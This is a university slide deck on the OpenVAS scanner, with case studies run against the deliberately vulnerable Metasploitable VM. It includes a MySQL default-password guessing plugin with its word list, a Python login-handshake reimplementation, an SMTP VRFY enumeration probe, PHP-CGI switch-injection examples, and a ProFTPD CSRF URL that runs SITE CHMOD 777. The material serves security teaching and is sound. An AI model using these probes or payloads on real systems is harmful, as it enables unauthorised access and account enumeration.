Using OpenVAS

Paul Nechifor

Valentin Schipor

Faculty of Computer Science

6 December 2013

Agenda

  • History
  • OpenVAS Architecture
  • OpenVAS Usage
  • Case Studies
    1. MySQL weak password
    2. VRFY & EXPN in Postfix
    3. PHP-CGI vulnerability
    4. ProFTPD Cross-site Request Forgery
  • Comparisons

Vulnerability Scanners

  • Tools for finding weaknesses in programs, systems, and networks.
  • Scan types:
    • Ports
    • Web applications
    • Database security
    • Computer networks, etc.

COPS

  • Short for Computer Oracle and Password System.
  • A suite of 12 tools for security auditing
    Unix systems created in 1989 by Dan Farmer.
  • The first to achieve widespread use.

  • Scans for:
    • poor passwords;
    • writability of users' home directories and startup files;
    • anonymous ftp setup;
    • tampering of important binaries;
    • and others.

SATAN

  • Short for Security Administrator Tool for Analyzing Networks.
  • Created by Dan Farmer and Wietse Venema and released in 1995.
  • Controversy and hysteria:
    • [F]iguring out how to break into a multitude of Internet sites is literally as easy as pulling up a dialog box in the program, and filling in two fields. — PC Magazine
    • SATAN is like a gun, and this is like handing a gun to a 12-year-old. — LA Times

OpenVAS

  • Short for Open Vulnerability Assessment System.
  • A framework of services and tools for finding and managing vulnerabilities.
  • Runs on Linux, but scans multiple platforms.
  • Open source. Forked from Nessus in 2005 after it became closed.

OpenVAS Architecture

OpenVAS Scanner

  • The core component: it connects to the targets and executes the tests, called Network Vulnerability Tests (NVTs).
  • Listens on TCP port 9391 as a TLS-wrapped service speaking the OpenVAS Transfer Protocol (OTP); it is not an HTTP/HTTPS server.

OpenVAS Manager

  • Acts as an intermediary between the scanner and clients.
  • Implements most of the logic of scanning and reading the configs so that consistent clients can be easily implemented on top.
  • OpenVAS Transfer Protocol (OTP): Manager to Scanner communication.
  • OpenVAS Management Protocol (OMP): Client to Manager communication (XML over TLS, port 9390 by default).

OpenVAS Administrator

  • Manages users and NVT feeds.
  • Feeds:
    • OpenVAS NVT Feed: free, updated daily, >30,000 NVTs.
    • Greenbone Security Feed: commercial.

Greenbone Security Desktop

  • Qt-based client which runs on Linux. (Previously: Windows, too.)

OpenVAS CLI

  • The command line interface client.
  • Used best for batch processes and scripts.

Greenbone Security Assistant

  • Web server normally bound to 127.0.0.1 (loopback only, so no external access).
  • Can be made accessible from other hosts by binding it to another address.
  • Runs on any platform with a browser.
  • GSA talks to the Manager (over OMP) and also to the Administrator.

NASL

  • Stands for Nessus Attack Scripting Language.
  • C-like language inherited from Nessus, specialised for writing NVTs (as opposed to a general-purpose scripting language).
  • Includes simple library functions for sockets, networks, HTTP, FTP, crypto, and others.
  • Source code usually found in /var/lib/openvas/plugins.

OpenVAS Usage

Kali Linux

  • What we used for hosting OpenVAS.
  • Kali Linux is a Debian-based distribution created for penetration testing.
  • Comes preinstalled with numerous tools: OpenVAS, Metasploit, Wireshark, nmap, John the Ripper, etc.

Metasploitable

  • What we will be scanning.
  • An intentionally vulnerable Linux virtual machine.
  • (Like the discontinued Damn Vulnerable Linux.)
  • Misconfigured, old, and with known vulnerabilities: databases, web services, FTP, SSH, and many others.

Preparing OpenVAS

Downloading the latest NVTs:

# openvas-nvt-sync

or from the GSA

Currently there are ~33000 NVTs.

Creating a Task

Choosing the deepest scan config and the Metasploitable VM as the target (with address 192.168.1.102).

Viewing Tasks

Viewing all the tasks. The previous one was started.

Task Details

Showing the status and the intermediary report.

Task Done

  • The deepest scan config completed after ~1 hour on my VM.
  • Scan results for two configurations, same target:

    Config                        High  Medium  Low  Log
    Full and fast                   41      21   15   75
    Full and very deep ultimate     45      25   16   76

  • Reports are downloadable in multiple formats: HTML, LaTeX, PDF, TXT, XML, and others.

Overview of threat level per port.

Detailed summaries with solutions and references.

Solutions usually suggest upgrading the application, but not always.

Case studies

1. MySQL weak password

Trying login from Kali Linux: Works

(Note: IP is different because I had to restart the VM.)

The NVT

Hunting down the NVT:

grep -r 'empty password' /var/lib/openvas/plugins | grep mysql

Full source code:

###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_mysql_weak_passwords.nasl 12 2013-10-27 11:15:33Z jan $
#
# MySQL weak password 
#
# Authors:
# Michael Meyer <[email protected]>
#
# Copyright:
# Copyright (c) 2012 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

include("revisions-lib.inc");
tag_summary = "It was possible to login into the remote MySQL as root using weak credentials.";

tag_solution = "Change the password as soon as possible.";

SCRIPT_OID  = "1.3.6.1.4.1.25623.1.0.103551";
CPE = "cpe:/a:mysql:mysql";

# need desc here to modify it later in script.
desc = "
 Summary:
 " + tag_summary + "
 Solution:
 " + tag_solution;
if (description)
{

 script_tag(name:"cvss_base", value:"9.0");
 script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:P/A:P");
 script_tag(name:"risk_factor", value:"Critical");
 script_oid(SCRIPT_OID);
 script_version("$Revision: 12 $");
 script_tag(name:"last_modification", value:"$Date: 2013-10-27 12:15:33 +0100 (Sun, 27 Oct 2013) $");
 script_tag(name:"creation_date", value:"2012-08-23 10:38:09 +0200 (Thu, 23 Aug 2012)");
 script_name("MySQL weak password");
 script_description(desc);
 script_summary("Checks if login with default credentials is possible");
 script_category(ACT_ATTACK);
 script_family("Default Accounts");
 script_copyright("This script is Copyright (C) 2012 Greenbone Networks GmbH");
 script_dependencies("mysql_version.nasl");
 script_require_ports("Services/mysql", 3306);
 script_require_keys("MySQL/installed");

 if (revcomp(a: OPENVAS_VERSION, b: "6.0+beta5") >= 0) {
   script_tag(name : "solution" , value : tag_solution);
   script_tag(name : "summary" , value : tag_summary);
 }
 exit(0);
}

include("byte_func.inc");
include("host_details.inc");

set_byte_order(BYTE_ORDER_LITTLE_ENDIAN);

port = get_app_port(cpe:CPE, nvt:SCRIPT_OID);
if(!port) {
    port = 3306;
}

if(!get_port_state(port))exit(0);
if(get_kb_item("MySQL/blocked"))exit(0);

username = "root";
passwords = make_list("admin","root","mysql","password","passw0rd","123456","12345678","mysqladmin","qwerty","letmein","database","");

foreach password (passwords) {

  ver = "";
  pass = "";
  req = "";
  native = FALSE;

  sock = open_sock_tcp(port);
  if(!sock)exit(0);

  res =  recv(socket:sock, length:4);
  if(!res) {
    close(sock);
    exit(0);
  }  

  plen = ord(res[0]) + (ord(res[1])/8) + (ord(res[2])/16);
  res =  recv(socket:sock, length:plen);

  if("mysql_native_password" >< res)native = TRUE;

  for (i=0; i<strlen(res); i++)  {
    if (ord(res[i]) != 0) {
      ver += res[i];
    }
      else {
      break;
    }
  }

  p = strlen(ver);
  if(p < 5) {
    close(sock);
    exit(0);
  }  

  caps = substr(res, 14+p, 15+p);
  if(!caps)continue;

  caps = ord(caps[0]) | ord(caps[1]) << 8;
  proto_is_41 = (caps & 512);
  if(!proto_is_41) {
    close(sock);
    exit(0);
  }  

  salt = substr(res, 5+p, 12+p);
  
  if(strlen(res) > (44+p)) {
    salt += substr(res, 32+p, 43+p);
  }  

  sha_pass1 = SHA1(password);
  sha_pass2 = SHA1(sha_pass1);
  sha_pass3 = SHA1(salt + sha_pass2);

  l = strlen(sha_pass3);

  for (i=0; i<l; i++) {
    pass += raw_string(ord(sha_pass1[i]) ^ ord(sha_pass3[i]));
  }  

  req = raw_string(0x05,0xa6,0x0f,0x00,0x00,0x00,0x00,0x01,0x21,0x00,0x00,0x00,0x00,0x00,
                   0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
                   0x00,0x00,0x00,0x00);

  req += raw_string(username,0x00);
  
  if(strlen(password) >0) {
    req += raw_string(0x14,pass);
  } else {
    req += raw_string(0x00);
  }  

  if(native) req += raw_string(0x6d,0x79,0x73,0x71,0x6c,0x5f,0x6e,0x61,0x74,0x69,0x76,0x65,0x5f,0x70,0x61,0x73,0x73,0x77,0x6f,0x72,0x64,0x00);

  len = strlen(req);
  req = raw_string(len & 0xff, (len >> 8) & 0xff, (len >> 16) & 0xff, 0x01) + req;

  send(socket:sock,data:req);
  res =  recv(socket:sock, length:4);

  if(!res || strlen(res) < 4) {
    close(sock);
    continue;
  }

  plen = ord(res[0]) + (ord(res[1])/8) + (ord(res[2])/16);

  res =  recv(socket:sock, length:plen);
  if(!res || strlen(res) < plen) {
    close(sock);
    continue;
  }

  errno = ord(res[2]) << 8 | ord(res[1]);

  if(errno > 0 || errno == "") {
    close(sock);
    continue;
  }

  cmd = 'show databases';
  len = strlen(cmd) + 1;
  req = raw_string(len & 0xff, (len >> 8) & 0xff, (len >> 16) & 0xff, 0x00, 0x03, cmd);

  send(socket:sock,data:req);

  z = 0;
  while(1) {

    z++;
    if(z > 15)exit(0);
    res =  recv(socket:sock, length:4);

    if(!res || strlen(res) < 4) {
      close(sock);
      exit(0);
    }

    plen = ord(res[0]) + (ord(res[1])/8) + (ord(res[2])/16);

    res =  recv(socket:sock, length:plen);
    if(!res || strlen(res) < plen)break;

    if("information_schema" >< res) {
      close(sock);

      data = desc + '\n\nIt was possible to login as root';

      if(strlen(password) > 0) {
        data += ' with password "' + password + '".';
      } else {
        data += ' with an empty password.';
      }

      data += '\n\n';

      security_hole(port:port,data:data);
      exit(0);
    }  

  }

  close(sock);  
}

close(sock);

  • Tries to see if the specified or standard port is open.
  • Loops through a small list of common passwords and opens a new connection for each one.

port = get_app_port(cpe:CPE, nvt:SCRIPT_OID);
if(!port) { port = 3306; }
if(!get_port_state(port)) exit(0);
if(get_kb_item("MySQL/blocked")) exit(0);
username = "root";
passwords = make_list("admin","root","mysql","password","passw0rd","123456","12345678","mysqladmin","qwerty","letmein","database","");
foreach password (passwords) {
  ...
  sock = open_sock_tcp(port);
  if(!sock)exit(0);
  res =  recv(socket:sock, length:4);
  ...
}

  • Runs the whole authentication handshake (protocol 4.1, mysql_native_password scramble).
  • Sends a query (show databases) to confirm that the login actually worked.

sha_pass1 = SHA1(password);
sha_pass2 = SHA1(sha_pass1);
sha_pass3 = SHA1(salt + sha_pass2);
...
req = raw_string(len & 0xff, (len >> 8) & 0xff, (len >> 16) & 0xff, 0x01) + req;
send(socket:sock,data:req);
res =  recv(socket:sock, length:4);
...
cmd = 'show databases';
len = strlen(cmd) + 1;
req = raw_string(len & 0xff, (len >> 8) & 0xff, (len >> 16) & 0xff, 0x00, 0x03, cmd);
send(socket:sock,data:req);
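The handshake, scramble and login that the NVT builds by hand, re-implemented in Python as an added example (this is not the plugin's code and not from the original slides). The server greeting is constructed inline for the demo; the offsets mirror the ones the NASL indexes relative to p (5+p for the first salt bytes, 14+p for the capability flags, 32+p for the rest of the salt). Function and constant names are the example's own.

```python
import hashlib
import struct

CLIENT_PROTOCOL_41 = 0x0200       # the bit the NVT tests with (caps & 512)
CLIENT_PLUGIN_AUTH = 0x00080000   # server appends the auth plugin name when set
CLIENT_CAPS = 0x000fa605          # same fixed client flags the NVT sends (05 a6 0f 00)
MAX_PACKET = 0x01000000           # 00 00 00 01
CHARSET_UTF8 = 0x21               # utf8_general_ci


def mysql_packet(body, seq):
    """Prefix a payload with the 3-byte little-endian length and sequence id."""
    return struct.pack("<I", len(body))[:3] + bytes([seq]) + body


def split_packet(raw):
    """Inverse of mysql_packet: returns (sequence id, payload).

    Note: the NVT computes plen as b0 + b1/8 + b2/16, which only agrees with
    the real encoding (b0 | b1<<8 | b2<<16) for payloads shorter than 256 bytes.
    """
    length = raw[0] | raw[1] << 8 | raw[2] << 16
    return raw[3], raw[4:4 + length]


def parse_handshake(payload):
    """Parse a protocol-10 server greeting; returns (version, 20-byte salt, caps)."""
    if payload[0] != 0x0a:
        raise ValueError("unsupported greeting protocol version")
    p = payload.index(b"\x00", 1)          # NUL ending the version string (== strlen(ver))
    version = payload[1:p].decode("ascii")
    salt = payload[p + 5:p + 13]           # 8 bytes after the 4-byte connection id
    caps = struct.unpack_from("<H", payload, p + 14)[0]
    if not caps & CLIENT_PROTOCOL_41:
        raise ValueError("server does not speak protocol 4.1")
    caps |= struct.unpack_from("<H", payload, p + 19)[0] << 16
    if len(payload) > p + 44:
        salt += payload[p + 32:p + 44]     # 12 more salt bytes, NUL-terminated
    return version, salt, caps


def native_password_scramble(password, salt):
    """mysql_native_password token: SHA1(pw) XOR SHA1(salt + SHA1(SHA1(pw)))."""
    if not password:
        return b""                          # empty password -> empty token
    stage1 = hashlib.sha1(password.encode("utf-8")).digest()
    stage3 = hashlib.sha1(salt + hashlib.sha1(stage1).digest()).digest()
    return bytes(a ^ b for a, b in zip(stage1, stage3))


def build_login_packet(username, password, salt, plugin_auth):
    """HandshakeResponse41, laid out exactly like the NVT's raw_string() calls."""
    body = struct.pack("<IIB23x", CLIENT_CAPS, MAX_PACKET, CHARSET_UTF8)
    body += username.encode("utf-8") + b"\x00"
    token = native_password_scramble(password, salt)
    body += bytes([len(token)]) + token     # 0x14 + 20 bytes, or a single 0x00
    if plugin_auth:
        body += b"mysql_native_password\x00"
    return mysql_packet(body, seq=1)


def auth_result(payload):
    """Classify the reply to the login packet as (ok, error code).

    OK packets start with 0x00, ERR packets with 0xff followed by a 2-byte
    code (1045 is ER_ACCESS_DENIED_ERROR). The NVT reads the same two bytes.
    """
    if payload[0] == 0xff:
        return False, struct.unpack_from("<H", payload, 1)[0]
    if payload[0] == 0x00:
        return True, 0
    raise ValueError("unexpected packet type 0x%02x" % payload[0])


def build_query_packet(sql):
    """COM_QUERY (0x03); the NVT sends 'show databases' to confirm the login."""
    return mysql_packet(b"\x03" + sql.encode("utf-8"), seq=0)


def sample_greeting():
    """Constructed protocol-10 greeting (not a capture), shaped like a 5.x server's."""
    caps = 0x0000f7ff | CLIENT_PLUGIN_AUTH      # lower word includes CLIENT_PROTOCOL_41
    g = b"\x0a" + b"5.5.0-example\x00"          # protocol version + server version
    g += struct.pack("<I", 1234)                # connection id
    g += b"ABCDEFGH" + b"\x00"                  # salt part 1 + filler
    g += struct.pack("<HBHH", caps & 0xffff, CHARSET_UTF8, 0x0002, caps >> 16)
    g += bytes([21]) + b"\x00" * 10             # auth data length, reserved
    g += b"ijklmnopqrst" + b"\x00"              # salt part 2
    g += b"mysql_native_password\x00"
    return mysql_packet(g, seq=0)


if __name__ == "__main__":
    _, greeting = split_packet(sample_greeting())
    version, salt, caps = parse_handshake(greeting)
    login = build_login_packet("root", "", salt, caps & CLIENT_PLUGIN_AUTH)
    print(version, salt, login.hex())
```

To run it against a live server, read the greeting from a socket on port 3306, feed the payload to parse_handshake, send build_login_packet's output, and pass the next payload to auth_result; only a (True, 0) result followed by a successful COM_QUERY should be reported, which is what the NVT's information_schema check does.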

Solution

Changing the MySQL root password in Metasploitable, as per recommendation (mysqladmin, not the mysql client, sets the password from the command line; -p prompts for the current, empty, password):

$ mysqladmin -u root -p password [a-better-one-goes-here]
Enter password:
$ 

Trying the same thing again fails:

2. VRFY & EXPN in Postfix

What server is it?

Let's check the vulnerability

  • Connect using telnet.
  • Send EHLO (extended hello) to see which extensions the server advertises.
  • VRFY is listed. Sending VRFY root returns 252, which does not confirm that the mailbox exists (that would be 250) but says the server will accept mail for it and attempt delivery.

What about non-existent users?

Kali Linux: checking paul.nechifor.

Metasploitable: adding user paul.nechifor in the meantime.

Sidetrack: Send an email to root using telnet

Sidetrack: The email was received.

Solution

Edit /etc/postfix/main.cf to add disable_vrfy_command = yes and then:

# /etc/init.d/postfix restart
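The EHLO/VRFY exchange above, and what changes after the fix, as an added Python example that is not part of the original slides. probe_vrfy is the client side and can be pointed at any SMTP server; the stub server, its host name mail.example.test and the account list are constructed for the demo and only model Postfix's replies: 252 for an accepted address, 550 when local_recipient_maps does not know the user (with that map empty Postfix would answer 252 for every address), and 502 plus no VRFY line in the EHLO reply once disable_vrfy_command = yes is set.

```python
import smtplib
import socketserver
import threading

# Constructed account list standing in for the target's local users.
KNOWN_USERS = {"root", "paul.nechifor"}


class StubSmtpHandler(socketserver.StreamRequestHandler):
    """Just enough SMTP to model Postfix's VRFY behaviour (not Postfix code)."""

    def handle(self):
        disabled = self.server.vrfy_disabled
        self.wfile.write(b"220 mail.example.test ESMTP Postfix\r\n")
        for raw in self.rfile:
            verb, _, arg = raw.decode("ascii", "replace").strip().partition(" ")
            verb = verb.upper()
            if verb in ("EHLO", "HELO"):
                lines = [b"250-mail.example.test", b"250-PIPELINING", b"250-SIZE 10240000"]
                if not disabled:                     # Postfix only advertises VRFY when enabled
                    lines.append(b"250-VRFY")
                lines.append(b"250 8BITMIME")
                self.wfile.write(b"\r\n".join(lines) + b"\r\n")
            elif verb == "VRFY":
                user = arg.strip("<>").split("@")[0]
                if disabled:
                    self.wfile.write(b"502 5.5.1 VRFY command is disabled\r\n")
                elif user in KNOWN_USERS:
                    self.wfile.write(b"252 2.0.0 " + user.encode() + b"\r\n")
                else:
                    self.wfile.write(b"550 5.1.1 <" + user.encode() + b">: Recipient address "
                                     b"rejected: User unknown in local recipient table\r\n")
            elif verb == "QUIT":
                self.wfile.write(b"221 2.0.0 Bye\r\n")
                return
            else:
                self.wfile.write(b"502 5.5.2 Error: command not recognized\r\n")


class StubSmtpServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, vrfy_disabled):
        super().__init__(("127.0.0.1", 0), StubSmtpHandler)   # ephemeral loopback port
        self.vrfy_disabled = vrfy_disabled


def probe_vrfy(host, port, users):
    """EHLO, then VRFY each name. Returns (vrfy_advertised, {user: (code, text)})."""
    with smtplib.SMTP(host, port, local_hostname="kali.example.test", timeout=5) as smtp:
        smtp.ehlo()
        advertised = smtp.has_extn("vrfy")
        results = {}
        for user in users:
            code, text = smtp.verify(user)
            results[user] = (code, text.decode("ascii", "replace"))
        return advertised, results


def run_demo(vrfy_disabled):
    """Run probe_vrfy against the stub; replace the stub with a real host and port 25."""
    server = StubSmtpServer(vrfy_disabled)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return probe_vrfy(*server.server_address, ["root", "nobody.here"])
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("VRFY enabled :", run_demo(vrfy_disabled=False))
    print("VRFY disabled:", run_demo(vrfy_disabled=True))
```

The 550 reply is the part worth noticing: even without EXPN, a server that distinguishes known from unknown users at VRFY time lets an attacker enumerate accounts, which is why the NVT flags the command and why the fix is to disable it rather than to tune the replies.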

3. PHP-CGI vulnerability

How to view source in PHP.

How the page normally looks.

Appending ?-s to the URL (php-cgi treats it as its own -s, "show source", switch):

Solution

Upgrade PHP to a release in which php-cgi no longer accepts switches from the query string; Apache is only the front end here and is not the vulnerable component.
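Why ?-s reaches php-cgi as a switch at all, as an added Python model that is neither PHP's code nor part of the original slides. The first function is the CGI specification's rule (RFC 3875, section 4.4) for "indexed" queries; the second is a deliberately simplified model of the unpatched and patched php-cgi option handling, and the switch names it recognises are just -s and -d.

```python
from urllib.parse import unquote


def cgi_argv_from_query(query_string):
    """RFC 3875 section 4.4: a query string containing no unencoded '=' is an
    'indexed' query; the web server splits it on '+' and hands the URL-decoded
    pieces to the CGI program as command-line arguments. Any literal '='
    (even inside a value) switches the mechanism off, which is why the usual
    ?page=1 style never triggers it and why %3d is used to smuggle one in."""
    if query_string == "" or "=" in query_string:
        return []
    return [unquote(part) for part in query_string.split("+")]


def php_cgi_switches(query_string, patched):
    """Simplified model (not PHP source) of what php-cgi did with those args.

    Unpatched: they go through php-cgi's own option parser, so '-s' means
    'print the highlighted source of the requested script' and '-d name=value'
    overrides an INI directive. Patched: query-derived arguments are no longer
    treated as switches, so the same request is served normally.
    """
    if patched:
        return []
    switches = []
    argv = cgi_argv_from_query(query_string)
    i = 0
    while i < len(argv):
        arg = argv[i]
        if arg == "-s":
            switches.append(("show-source", None))
        elif arg == "-d" and i + 1 < len(argv):
            name, _, value = argv[i + 1].partition("=")
            switches.append(("ini", (name, value)))
            i += 1
        elif arg.startswith("-"):
            switches.append(("other", arg))
        i += 1
    return switches


if __name__ == "__main__":
    for qs in ("-s", "page=1&-s", "-d+display_errors%3d1"):
        print(qs, "->", cgi_argv_from_query(qs), php_cgi_switches(qs, patched=False))
```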

4. ProFTPD Cross-site Request Forgery

The problem in the source code is that the command reader calls fgets() in a while loop with a fixed-size buffer: a command longer than the buffer is returned in several pieces, and each piece is dispatched as a separate command. For example, a long command like:

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

is split into two commands, each answered on its own:

500 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA':
command not understood.
500'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

So requesting this from a browser:

ftp://[email protected]//////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
/////////////////////////////////////syst

also results in the trailing SYST being executed as a command of its own.

From here the bug can be exploited like any other CSRF attack, for example by placing a crafted img tag on a page and tricking an admin into loading it.

Example:

ftp://ftp.netbsd.org//////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
/////////////////////////////////////SITE%20CHMOD%20777%20EXAMPLEFILE

will change the permissions of EXAMPLEFILE when its owner opens this URL in a browser that authenticates to the server.

So this needs to be inserted into a page that the admin will visit: <img src="ftp://.../SITE%20CHMOD%20777%20EXAMPLEFILE">

Solution

The fix uses a flag byte to record that the input line overflowed the buffer, so the remainder of the line is discarded and the command rejected instead of being parsed as further commands.

The vulnerable parts of ProFTPD have been patched and are available in the newest versions.
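The splitting behaviour and the fix, modelled in Python as an added example (not ProFTPD's code and not from the original slides). fgets mimics the C call; the vulnerable and fixed readers are side by side. BUFSIZE is an assumption (the real buffer size is not on the slides), and csrf_line assumes the crafted ftp:// URL ends up as a CWD line, which the slides do not state either; only the padding-to-the-boundary idea is taken from them.

```python
import io

BUFSIZE = 512  # assumed fixed command buffer size; the real value is not on the slides


def fgets(fp, size):
    """Mimic C's fgets(buf, size, fp): read through the first newline or
    size-1 bytes, whichever comes first. Returns None at end of input."""
    out = bytearray()
    while len(out) < size - 1:
        c = fp.read(1)
        if not c:
            break
        out += c
        if c == b"\n":
            break
    return bytes(out) if out else None


def read_commands_vulnerable(data, size=BUFSIZE):
    """Old reader: whatever fgets() returns is dispatched as a command, so a
    line longer than the buffer arrives as several commands."""
    fp, cmds = io.BytesIO(data), []
    while True:
        line = fgets(fp, size)
        if line is None:
            return cmds
        cmds.append(line.rstrip(b"\r\n"))


def read_commands_fixed(data, size=BUFSIZE):
    """Fixed reader: a flag (the 'overflow byte') records that the buffer filled
    without a newline; the rest of that line is drained and the whole command
    rejected, instead of the tail becoming a new command."""
    fp, cmds = io.BytesIO(data), []
    while True:
        line = fgets(fp, size)
        if line is None:
            return cmds
        overflow = not line.endswith(b"\n")
        while overflow:                      # drain until the real end of line
            rest = fgets(fp, size)
            overflow = rest is not None and not rest.endswith(b"\n")
        if line.endswith(b"\n"):
            cmds.append(line.rstrip(b"\r\n"))
        else:
            cmds.append(b"<rejected: command too long>")


def csrf_line(tail, size=BUFSIZE):
    """Line the crafted URL is assumed to produce: a CWD padded with '/' so the
    buffer fills exactly and the tail starts a fresh fgets() call."""
    pad = b"/" * (size - 1 - len(b"CWD "))
    return b"CWD " + pad + tail + b"\r\n"


def verbs(cmds):
    """First word of each dispatched command, upper-cased as the server would."""
    return [c.split(b" ", 1)[0].upper() for c in cmds]


if __name__ == "__main__":
    line = csrf_line(b"SITE CHMOD 777 EXAMPLEFILE")
    print("vulnerable:", verbs(read_commands_vulnerable(line)))
    print("fixed     :", read_commands_fixed(line))
```

With the vulnerable reader the padded CWD is answered with a 500 (the slides' "command not understood") and the SITE CHMOD that follows is executed; with the fixed reader the whole line is rejected once and nothing after the boundary is treated as a command.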

Comparisons

OpenVAS vs Nessus

  • A comparison done by LS&S in 2009 with 15 servers and multiple vulnerabilities (share of the vulnerabilities found):

    Tool     Percentage
    Nessus   84 %
    OpenVAS  24 %

  • The tests show a clear superiority of Nessus in the overall results.

OpenVAS vs Nessus

  • The same test, counting only vulnerabilities discovered in the last two years:

    Tool     Percentage
    Nessus   36 %
    OpenVAS  72 %

  • The test concludes:
    Even though Nessus [...] has a larger base of plugins and discovers more known vulnerabilities, results [...] showed that the OpenVAS scanner discovers more recent vulnerabilities. These are pretty good results for OpenVAS considering Nessus has three times more plugins and 10+ years of development behind it.
  • Given that OpenVAS is free and Nessus costs $1500 per year, OpenVAS is a good alternative for security auditing.
